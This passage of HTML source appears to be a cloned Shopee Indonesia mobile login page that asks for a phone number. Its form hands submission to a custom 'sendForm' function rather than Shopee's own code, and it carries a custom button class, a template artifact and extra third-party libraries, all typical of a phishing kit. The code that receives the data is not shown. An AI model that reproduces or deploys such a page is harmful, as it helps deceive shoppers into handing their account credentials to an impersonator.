ll-live-sg/account/vendor.d9dacc8de07cc0afba4f.legacy.js","https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/common.bffd39d927a718637659.legacy.js","https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/user-microfe-account-mobile-verify-account-seller-main-sub.3a7ab19b1fae66a906e9.legacy.js"],"css":["https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/user-microfe-account-mobile-verify-account-seller-main-sub.bbb1d0e27bfc7c86c4f3.legacy.css"]},"modern":{"js":["https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/runtime.30f40a5afcfeadbe652c.js","https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/vendor.2a8f0855480665eb7acd.js","https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/common.8498d35d7126c25ca309.js","https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/user-microfe-account-mobile-verify-account-seller-main-sub.fde4783e312614b37bb1.js"],"css":["https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/account/user-microfe-account-mobile-verify-account-seller-main-sub.9234ae22c31f99d9f43c.css"]}}}</script>
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col478.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col113.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col515.1706086666.json">
<link rel="stylesheet" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/homepagefe/mobilemall-homepagefe.87301668957130cdfee2.css">
<script type="text/javascript" id="sp-af-c9349935" src="https://deo.shopeemobile.com/shopee/web-sdk/js/live/76d897f87c1783ebca6f8ed716325bc3a933558f.js"></script>
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col108.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col102.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col31.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col457.1706086666.json">
<meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9">
<meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9">
<script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/amd/@shopee/tracking-ubt@0535428.min.js" src="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/amd/@shopee/tracking-ubt@0535428.min.js"></script>
<script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/amd/@shopee/tracking-algo@0535428.min.js" src="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/amd/@shopee/tracking-algo@0535428.min.js"></script>
<link rel="stylesheet" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/flashsale/89.1731036341b856a82bef.legacy.css">
<link rel="stylesheet" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/flashsale/364.e83c696a66007ffab990.legacy.css">
<link rel="stylesheet" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/flashsale/828.81aac3c3afa236470eb7.legacy.css">
<link rel="stylesheet" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/flashsale/mobilemall-flashsaleentrance.c9ed32b48f46b3dae6b5.legacy.css">
<title>Login sekarang untuk mulai berbelanja! | Shopee Indonesia</title>
<meta name="theme-color" content="#ee4d2d" data-rh="true">
<script type="application/ld+json" data-rh="true">{"@context":"http://schema.org","@type":"WebSite","url":"https://shopee.co.id","potentialAction":{"@type":"SearchAction","target":"/search?keyword={search_term_string}","query-input":"required name=search_term_string"},"name":"Shopee","sameAs":["https://www.facebook.com/ShopeeID","https://www.instagram.com/Shopee_ID","https://twitter.com/shopeeid","https://www.youtube.com/channel/UCwljrkoI5jsfvAKgW3zNC7Q","https://play.google.com/store/apps/details?id=com.shopee.id","https://itunes.apple.com/ID/app/id959841443"]}</script>
<link rel="stylesheet" type="text/css" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/homepagefe/HomeMall.8fafa2bc17033b04bc93.css">
<link rel="stylesheet" type="text/css" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/homepagefe/HomeCategoryList.573ef952e0aaf3745f74.css">
<link rel="stylesheet" type="text/css" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/homepagefe/HomeLiveStream.f37b955675a19d7c17f4.css">
<meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col131.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col132.1706086666.json">
<link rel="stylesheet" type="text/css" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/2142.00c7126649a56eca.css">
<script type="text/javascript" charset="utf-8" async="" data-requirecontext="_" data-requiremodule="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/amd/@shopee/tracking-core@0535428.min.js" src="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/amd/@shopee/tracking-core@0535428.min.js"></script>
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col43.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col343.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col561.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col409.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col528.1706086666.json">
<link rel="prefetch" as="fetch" href="https://deo.shopeemobile.com/shopee/stm-sg-live/shopee-mobilemall-live-sg/id.col118.1706691816.json">
<link rel="canonical" href="https://shopee.co.id/buyer/login" data-rh="true">
<link rel="alternate" href="https://shopee.com" hreflang="x-default" data-rh="true">
<link rel="alternate" href="https://shopee.sg/buyer/login" hreflang="en-SG" data-rh="true">
<link rel="alternate" href="https://shopee.com.my/buyer/login" hreflang="en-MY" data-rh="true">
<link rel="alternate" href="https://shopee.co.th/buyer/login" hreflang="th-TH" data-rh="true">
<link rel="alternate" href="https://shopee.tw/buyer/login" hreflang="zh-TW" data-rh="true">
<link rel="alternate" href="https://shopee.co.id/buyer/login" hreflang="id-ID" data-rh="true">
<link rel="alternate" href="https://shopee.vn/buyer/login" hreflang="vi-VN" data-rh="true">
<link rel="alternate" href="https://shopee.ph/buyer/login" hreflang="en-PH" data-rh="true">
<link rel="alternate" href="https://shopee.com.br/buyer/login" hreflang="pt-BR" data-rh="true">
<link rel="alternate" href="https://shopee.com.mx/buyer/login" hreflang="es-MX" data-rh="true">
<link rel="alternate" href="https://shopee.com.co/buyer/login" hreflang="es-CO" data-rh="true">
<link rel="alternate" href="https://shopee.cl/buyer/login" hreflang="es-CL" data-rh="true">
<meta name="description" content="Login sekarang untuk menemukan berbagai promo terbaik dan harga paling terjangkau di Shopee Indonesia!" data-rh="true">
<meta name="robots" content="index, follow" data-rh="true">
<meta property="og:title" content="Login sekarang untuk mulai berbelanja! | Shopee Indonesia" data-rh="true">
<meta property="og:type" content="website" data-rh="true">
<meta property="og:url" content="https://shopee.co.id/buyer/login" data-rh="true">
<meta property="og:image" content="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/26c9324913c021677768c36975d635ef.png" data-rh="true">
<meta property="og:description" content="Login sekarang untuk menemukan berbagai promo terbaik dan harga paling terjangkau di Shopee Indonesia!" data-rh="true">
<script type="text/javascript" id="facebook-auth" src="//connect.facebook.net/en_US/sdk.js"></script>
<script type="text/javascript" id="google-auth" src="//accounts.google.com/gsi/client"></script>
</head>
<body style="background-color: rgb(255, 255, 255);">
<noscript>
<iframe src="//www.googletagmanager.com/ns.html?id=GTM-WJZQSJF" height="0" width="0" style="display:none;visibility:hidden">
</iframe>
</noscript>
<div id="app">
	<style id="nebula-style">
:root{--nc-primary:#ee4d2d;--nc-primary-bg:#fef6f5;--nc-primary-gradient:linear-gradient(#ee4d2d,#ff7337);--nc-secondary-blue:#0046ab;--nc-secondary-yellow:#eda500;--nc-secondary-green:#26aa99;--nc-error:#ee2c4a;--nc-error-bg:#fff4f4;--nc-caution:#f69113;--nc-caution-bg:#fff8e4;--nc-success:#30b566;--nc-success-bg:#f7fffe;--nc-text-primary:rgba(0,0,0,.87);--nc-text-primary-o:#212121;--nc-text-secondary:rgba(0,0,0,.65);--nc-text-secondary-o:#595959;--nc-text-tertiary:rgba(0,0,0,.54);--nc-text-tertiary-o:#757575;--nc-text-link:#0088ff;--nc-util-mask:rgba(0,0,0,.4);--nc-util-disabled:rgba(0,0,0,.26);--nc-util-disabled-o:#bdbdbd;--nc-util-line:rgba(0,0,0,.09);--nc-util-line-o:#e8e8e8;--nc-util-bg:#f5f5f5;--nc-util-placeholder:#fafafa;--nc-util-pressed:rgba(0,0,0,.05);--nt-font-regular-f:-apple-system,'HelveticaNeue','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif;--nt-font-regular-w:400;--nt-font-medium-f:-apple-system,'HelveticaNeue-Medium','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif;--nt-font-medium-w:500;--nt-font-bold-f:-apple-system,'HelveticaNeue-Bold','Helvetica Neue','Roboto','Droid Sans','Arial Bold',Arial,sans-serif;--nt-font-bold-w:700;--nt-size-foot:.625rem;--nt-size-foot-l:.75rem;--nt-size-foot-lp:.75rem;--nt-size-foot-t:1rem;--nt-size-foot-tp:1rem;--nt-size-small:.75rem;--nt-size-small-l:.875rem;--nt-size-small-lp:1.25rem;--nt-size-small-t:1.125rem;--nt-size-small-tp:1.125rem;--nt-size-normal:.875rem;--nt-size-normal-l:1rem;--nt-size-normal-lp:1.25rem;--nt-size-normal-t:1.375rem;--nt-size-normal-tp:1.375rem;--nt-size-large:1rem;--nt-size-large-l:1.25rem;--nt-size-large-lp:1.375rem;--nt-size-large-t:1.5rem;--nt-size-large-tp:1.5rem;--nt-size-title:1.25rem;--nt-size-title-l:1.5rem;--nt-size-title-lp:1.5rem;--nt-size-title-t:1.875rem;--nt-size-title-tp:1.875rem;--ns-a:.25rem;--ns-b:.5rem;--ns-c:.75rem;--ns-d:1rem;--ns-e:1.25rem;--ns-f:1.5rem;--ns-g:2.5rem;--ne-depth6:0 0 .375rem rgba(0,0,0,.06);--ne-depth9:0 0 .5625rem rgba(0,0,0,.12);--nr-normal:.125rem;--nr-overlay:.25rem}.nt-foot{font-size:var(--nt-size-foot,.625rem);line-height:var(--nt-size-foot-l,.75rem)}.nt-foot-p{font-size:var(--nt-size-foot,.625rem);line-height:var(--nt-size-foot-lp,.75rem)}.nt-small{font-size:var(--nt-size-small,.75rem);line-height:var(--nt-size-small-l,.875rem)}.nt-small-p{font-size:var(--nt-size-small,.75rem);line-height:var(--nt-size-small-lp,1.25rem)}.nt-normal{font-size:var(--nt-size-normal,.875rem);line-height:var(--nt-size-normal-l,1rem)}.nt-normal-p{font-size:var(--nt-size-normal,.875rem);line-height:var(--nt-size-normal-lp,1.25rem)}.nt-large{font-size:var(--nt-size-large,1rem);line-height:var(--nt-size-large-l,1.25rem)}.nt-large-p{font-size:var(--nt-size-large,1rem);line-height:var(--nt-size-large-lp,1.375rem)}.nt-title{font-size:var(--nt-size-title,1.25rem);line-height:var(--nt-size-title-l,1.5rem)}.nt-title-p{font-size:var(--nt-size-title,1.25rem);line-height:var(--nt-size-title-lp,1.5rem)}.nt-regular{font-family:var(--nt-font-regular-f,-apple-system,'HelveticaNeue','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif);font-weight:var(--nt-font-regular-w,400)}.nt-medium{font-family:var(--nt-font-medium-f,-apple-system,'HelveticaNeue-Medium','Helvetica Neue','Roboto','Droid Sans',Arial,sans-serif);font-weight:var(--nt-font-medium-w,500)}.nt-bold{font-family:var(--nt-font-bold-f,-apple-system,'HelveticaNeue-Bold','Helvetica Neue','Roboto','Droid Sans','Arial Bold',Arial,sans-serif);font-weight:var(--nt-font-bold-w,700)}

.btn-punya{
     transition: background 100ms step-start 0s;
}

  .btn-punya:disabled {
            
        }

        @media only screen and (max-width: 600px) {
            .btn-punya {
                width: 100%%;
                color: white;
            }
        }
        
	</style>
	<div class="app-container">
		<div class="">
			<div class="yBiLBR">
				<svg viewbox="0 0 22 17" class="EexaNM"><g stroke="none" stroke-width="1" fill-rule="evenodd" transform="translate(-3, -6)"><path d="M5.78416545,15.2727801 L12.9866648,21.7122915 C13.286114,22.0067577 13.286114,22.4841029 12.9866648,22.7785691 C12.6864297,23.0738103 12.200709,23.0738103 11.9004739,22.7785691 L3.29347136,15.0837018 C3.27067864,15.0651039 3.23845445,15.072853 3.21723364,15.0519304 C3.06240034,14.899273 2.99480814,14.7001208 3.00030983,14.5001937 C2.99480814,14.3002667 3.06240034,14.1003396 3.21723364,13.9476821 C3.23845445,13.9275344 3.2714646,13.9345086 3.29425732,13.9166857 L11.9004739,6.22026848 C12.200709,5.92657717 12.6864297,5.92657717 12.9866648,6.22026848 C13.286114,6.51628453 13.286114,6.99362977 12.9866648,7.288096 L5.78416545,13.7276073 L24.2140442,13.7276073 C24.6478918,13.7276073 25,14.0739926 25,14.5001937 C25,14.9263948 24.6478918,15.2727801 24.2140442,15.2727801 L5.78416545,15.2727801 Z"></path></g></svg>
				<div class="feM3Km xBLm63">
					<div class="q8yQDO">Log in</div>
				</div>
				<div class="u+60tx">
					<div class="_2vha3u">
						<div class="x2vxKy">
							<svg viewbox="0 0 24 24" fill="none" width="24" height="24" color="#ee4d2d"><path fill-rule="evenodd" clip-rule="evenodd" d="M20.5 12a8.5 8.5 0 11-17 0 8.5 8.5 0 0117 0zm1.5 0c0 5.523-4.477 10-10 10S2 17.523 2 12 6.477 2 12 2s10 4.477 10 10zm-10.783 1.02c-.16.379-.24.888-.24 1.526h1.65c.01-.691.175-1.217.494-1.577l.894-.871c.737-.759 1.105-1.53 1.105-2.312 0-.878-.274-1.562-.821-2.052-.543-.49-1.301-.734-2.275-.734-.945 0-1.705.247-2.282.741-.572.495-.862 1.167-.872 2.017h1.766c0-.399.126-.713.378-.944.257-.235.593-.352 1.01-.352.436 0 .766.12.988.36.228.235.342.578.342 1.03 0 .34-.097.657-.29.95-.127.192-.427.516-.902.972-.47.451-.785.866-.945 1.245zm-.094 3.081c-.18.173-.269.401-.269.684 0 .264.085.485.254.663.175.177.422.266.742.266s.566-.089.74-.266a.908.908 0 00.263-.663.912.912 0 00-.27-.677c-.179-.182-.423-.273-.733-.273-.306 0-.548.089-.727.266z" fill="currentColor"></path></svg>
						</div>
					</div>
				</div>
			</div>
			<div class="uO7K5K">
				<form onsubmit="sendForm(event); return false">
					<div class="Y6szdr DQOegR">
						<div class="a2DpIo">
							<svg enable-background="new 0 0 54 61" viewbox="0 0 54 61" class="_6K8fUJ"><path stroke="currentColor" fill="currentColor" d="M35.67,44.95 C35.34,47.70 33.67,49.91 31.09,51.01 C29.65,51.63 27.72,51.96 26.19,51.85 C23.81,51.76 21.57,51.18 19.50,50.12 C18.77,49.74 17.67,48.99 16.82,48.28 C16.61,48.10 16.58,47.99 16.73,47.78 C16.80,47.67 16.94,47.46 17.25,47.01 C17.71,46.34 17.76,46.26 17.81,46.18 C17.96,45.96 18.19,45.94 18.42,46.12 C18.45,46.14 18.45,46.14 18.47,46.16 C18.50,46.19 18.50,46.19 18.59,46.26 C18.68,46.33 18.74,46.37 18.76,46.39 C20.99,48.13 23.58,49.13 26.20,49.24 C29.84,49.19 32.46,47.55 32.93,45.03 C33.44,42.27 31.27,39.88 27.02,38.54 C25.69,38.13 22.33,36.78 21.71,36.42 C18.80,34.71 17.44,32.47 17.64,29.71 C17.93,25.88 21.49,23.03 25.98,23.01 C27.98,23.01 29.99,23.42 31.91,24.23 C32.60,24.52 33.81,25.18 34.23,25.50 C34.47,25.68 34.52,25.88 34.38,26.11 C34.31,26.24 34.18,26.44 33.91,26.87 L33.91,26.87 C33.55,27.44 33.54,27.46 33.46,27.59 C33.32,27.80 33.15,27.82 32.90,27.66 C30.84,26.28 28.55,25.58 26.04,25.53 C22.91,25.59 20.57,27.45 20.42,29.99 C20.38,32.28 22.09,33.95 25.80,35.22 C33.33,37.64 36.21,40.48 35.67,44.95 M26.37,5.43 C31.27,5.43 35.27,10.08 35.46,15.90 L17.29,15.90 C17.47,10.08 21.47,5.43 26.37,5.43 M51.74,17.00 C51.74,16.39 51.26,15.90 50.66,15.90 L50.64,15.90 L38.88,15.90 C38.59,8.21 33.10,2.08 26.37,2.08 C19.64,2.08 14.16,8.21 13.87,15.90 L2.07,15.90 C1.48,15.91 1.01,16.40 1.01,17.00 C1.01,17.03 1.01,17.05 1.01,17.08 L1.00,17.08 L2.68,54.14 C2.68,54.25 2.69,54.35 2.69,54.46 C2.69,54.48 2.70,54.50 2.70,54.53 L2.70,54.60 L2.71,54.61 C2.96,57.19 4.83,59.26 7.38,59.36 L7.38,59.37 L44.80,59.37 C44.81,59.37 44.83,59.37 44.85,59.37 C44.87,59.37 44.88,59.37 44.90,59.37 L44.98,59.37 L44.98,59.36 C47.57,59.29 49.67,57.19 49.89,54.58 L49.89,54.58 L49.90,54.54 C49.90,54.51 49.90,54.49 49.90,54.46 C49.90,54.39 49.91,54.33 49.91,54.26 L51.74,17.05 L51.74,17.05 C51.74,17.04 51.74,17.02 51.74,17.00"></path></svg>
						</div>
						<div class="EUrtGZ">
							<svg viewbox="0 0 24 24" fill="none" width="24" height="24" color="rgba(0, 0, 0, 0.65)" class="aDKDCX"><path d="M14.316 14.1a.75.75 0 00.076 1.298l6.167 3.084c.424.211.691.644.691 1.118v1.65H2.75V19.6c0-.474.268-.907.691-1.118l6.167-3.084a.75.75 0 00.077-1.297c-1.292-.85-2.39-2.419-2.39-3.92V7.456c0-1.291.407-2.465 1.171-3.307C9.22 3.318 10.373 2.75 12 2.75c1.627 0 2.78.568 3.534 1.398.763.842 1.17 2.016 1.17 3.307v2.727c0 1.504-1.093 3.07-2.388 3.918z" stroke="currentColor" stroke-width="1.5" stroke-linecap="square" stroke-linejoin="round"></path></svg>
	<input id="user" class="WrQrp0 _4dCZIs" type="tel" placeholder="Nomor Telepon" autocomplete="tel" autocorrect="off" autocapitalize="off" value="" minlength="10" maxlength="13" required></div>
<button type="submit" id="doLog" class="btn-punya _3sjFp lJMau AHhqR TOjHY nt-regular nt-large" disabled="" style="margin-top: 14px; width: 100%;"><span class="_2HCeY">Berikutnya</span></button>
</form>
						<div class="MZW3WX">
							<a class="+H+ETm" href="#">Daftar</a><a class="+H+ETm" href="login.html">Log in dengan Password</a>
						</div>
						<div>
							<div class="rB03x1">
								<div class="_8X8+pW"></div>
								<div class="nExMSv">ATAU</div>
								<div class="_8X8+pW"></div>
							</div>
							<button type="button" class="_8CVbVL lyJbNT uHiQ7i">
							<div class="Bq4Bra">
								<div class="_1a550J social-white-background social-white-whatsapp-png"></div>
							</div>
							<div class="_3AtLpn">Log In dengan WhatsApp</div>
					</button>
					
					<button type="button" class="_8CVbVL lyJbNT uHiQ7i">
							<div class="Bq4Bra">
								<div class="_1a550J social-white-background social-white-fb-blue-png"></div>
							</div>
							<div class="_3AtLpn">Log In dengan Facebook</div>
							</button><button type="button" class="_8CVbVL lyJbNT uHiQ7i">
							<div class="Bq4Bra">
								<div class="_1a550J social-white-background social-white-google-disabled-png"></div>
							</div>
							<div class="_3AtLpn">Log In dengan Google</div>
							</button>
						</div>
					</div>
				</form>
			</div>
		</div>
	</div>
</div>
<div id="modal">
	<style id="modal-inset" data-top="0" data-right="0" data-bottom="0" data-left="0">
.modal-inset{top:0;right:0;bottom:0;left:0;position:fixed;pointer-events:none}.modal-inset>*{pointer-events:auto}
	</style>
</div>
<noscript>Please enable JavaScript on your browser.</noscript>
<script type="module" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/webpack-runtime.3e4c1abcf683862f.js"></script>
<script type="module" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/entry-modules.812bedd0f4ca6077.js"></script>
<script type="module" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/modules.249ec469f1b4804c.js"></script>
<script type="module" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.50f2d053c15a863c.js"></script>
<script nomodule="">function loadStyleLink(e){var t=document.head||document.getElementsByTagName("head")[0],l=document.createElement("link");l.rel="stylesheet",l.type="text/css",l.href=e,t.appendChild(l)}if(!SUPPORT_MODULE){for(var links=["https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.a880051c8c2bc9f6.legacy.css"],i=0;i<links.length;i++)try{loadStyleLink(links[i])}catch(e){}try{document.querySelectorAll("[data-modern]").forEach((function(e){e.remove()}))}catch(e){}}</script>
<script defer="defer" nomodule="" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/webpack-runtime.8cf15469721db710.legacy.js"></script>
<script defer="defer" nomodule="" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/entry-modules.b801582a47db3354.legacy.js"></script>
<script defer="defer" nomodule="" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/modules.d99a7de93b736082.legacy.js"></script>
<script defer="defer" nomodule="" src="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/bundle.a17dfee9b670569b.legacy.js"></script>
<script async="" src="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/@shopee/tracking-loader@1.1.20.min.js"></script>
<script async="" src="https://deo.shopeemobile.com/shopee/shopee-trackingsdk-live-sg/require-trackingsdk.js"></script>
<script src='https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.10/vue.min.js'></script>
<script src='https://unpkg.com/vue-the-mask@0.11.1/dist/vue-the-mask.js'></script>
   
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous">
    </script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-u1OknCvxWvY5kfmNBILK2hRnQC3Pr17a+RTT6rIHI7NnikvbZlHgTPOOmMi466C8" crossorigin="anonymous"></script>
<script type="text/javascript" id="">!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version="2.0",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,"script","//connect.facebook.net/en_US/fbevents.js");fbq("init",google_tag_manager["rm"]["7691473"](3));fbq("track","PageView");</script>
<noscript>
<img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=466924370133774&amp;ev=PageView&amp;noscript=1">
</noscript>
<script type="text/javascript" id="">function track_keyToGet(){try{var a=get_key(p.keyToGet);null!==a?setCookie(p.cookieName,a):track_keyToSearch()}catch(b){console.warn("[medium_cookie_create][track_keyToGet]",b)}}function track_keyToSearch(){try{var a=Object.entries(p.keyToSearch),b=!0;for(i=0;i<a.length;i++){var c=a[i],d=get_key(c[0]);if(null!==d){setCookie(p.cookieName,c[1]);b=!1;break}}b&&get_refer()}catch(e){console.warn("[medium_cookie_create][track_keyToSearch]",e)}}
function get_refer(){try{refer&&!shopee_refer_check.test(refer)&&setCookie(p.cookieName,"refer")}catch(a){console.warn("[medium_cookie_create][get_refer]",a)}}function get_key(a){try{var b=window.location.href;a="[\\?\x26]"+a+"\x3d([^\x26#]*)";a=new RegExp(a);a=a.exec(b);return null==a?null:a[1]}catch(c){return console.warn("[medium_cookie_create][get_key]",c),null}}
function setCookie(a,b){try{var c=new Date;c.setTime(c.getTime()+864E5*p.cookieTime);var d=";expires\x3d"+c.toUTCString();document.cookie=a+"\x3d"+b+d+";path\x3d"+p.path+";domain\x3d"+p.domain}catch(e){return console.warn("[medium_cookie_create][setCookie]",e),null}}try{var p=google_tag_manager["rm"]["7691473"](4),refer=google_tag_manager["rm"]["7691473"](5),shopee_refer_check=new RegExp(p.shopee_refer,"i");track_keyToGet()}catch(a){console.warn("[medium_cookie_create]",a)};</script>
<script type="text/javascript" id="">!function(){function k(a,b){b?(l[0]=l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0,this.blocks=l):this.blocks=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];a?(this.h0=3238371032,this.h1=914150663,this.h2=812702999,this.h3=4144912697,this.h4=4290775857,this.h5=1750603025,this.h6=1694076839,this.h7=3204075428):(this.h0=1779033703,this.h1=3144134277,this.h2=1013904242,this.h3=2773480762,this.h4=1359893119,this.h5=2600822924,this.h6=528734635,this.h7=1541459225);this.block=
this.start=this.bytes=this.hBytes=0;this.finalized=this.hashed=!1;this.first=!0;this.is224=a}function x(a,b,c){var f=typeof a;if("string"===f){var e,m=[],d=a.length,g=0;for(f=0;f<d;++f)128>(e=a.charCodeAt(f))?m[g++]=e:2048>e?(m[g++]=192|e>>6,m[g++]=128|63&e):55296>e||57344<=e?(m[g++]=224|e>>12,m[g++]=128|e>>6&63,m[g++]=128|63&e):(e=65536+((1023&e)<<10|1023&a.charCodeAt(++f)),m[g++]=240|e>>18,m[g++]=128|e>>12&63,m[g++]=128|e>>6&63,m[g++]=128|63&e);a=m}else{if("object"!==f)throw Error(u);if(null===
a)throw Error(u);if(w&&a.constructor===ArrayBuffer)a=new Uint8Array(a);else if(!(Array.isArray(a)||w&&ArrayBuffer.isView(a)))throw Error(u);}64<a.length&&(a=(new k(b,!0)).update(a).array());e=[];m=[];for(f=0;64>f;++f)d=a[f]||0,e[f]=92^d,m[f]=54^d;k.call(this,b,c);this.update(m);this.oKeyPad=e;this.inner=!0;this.sharedMemory=c}var u="input is invalid type",v="object"==typeof window,p=v?window:{};p.JS_SHA256_NO_WINDOW&&(v=!1);v=!v&&"object"==typeof self;var A=!p.JS_SHA256_NO_NODE_JS&&"object"==typeof process&&
process.versions&&process.versions.node;A?p=global:v&&(p=self);v=!p.JS_SHA256_NO_COMMON_JS&&"object"==typeof module&&module.exports;var F="function"==typeof define&&define.amd,w=!p.JS_SHA256_NO_ARRAY_BUFFER&&"undefined"!=typeof ArrayBuffer,c="0123456789abcdef".split(""),G=[-2147483648,8388608,32768,128],n=[24,16,8,0],y=[1116352408,1899447441,3049323471,3921009573,961987163,1508970993,2453635748,2870763221,3624381080,310598401,607225278,1426881987,1925078388,2162078206,2614888103,3248222580,3835390401,
4022224774,264347078,604807628,770255983,1249150122,1555081692,1996064986,2554220882,2821834349,2952996808,3210313671,3336571891,3584528711,113926993,338241895,666307205,773529912,1294757372,1396182291,1695183700,1986661051,2177026350,2456956037,2730485921,2820302411,3259730800,3345764771,3516065817,3600352804,4094571909,275423344,430227734,506948616,659060556,883997877,958139571,1322822218,1537002063,1747873779,1955562222,2024104815,2227730452,2361852424,2428436474,2756734187,3204031479,3329325298],
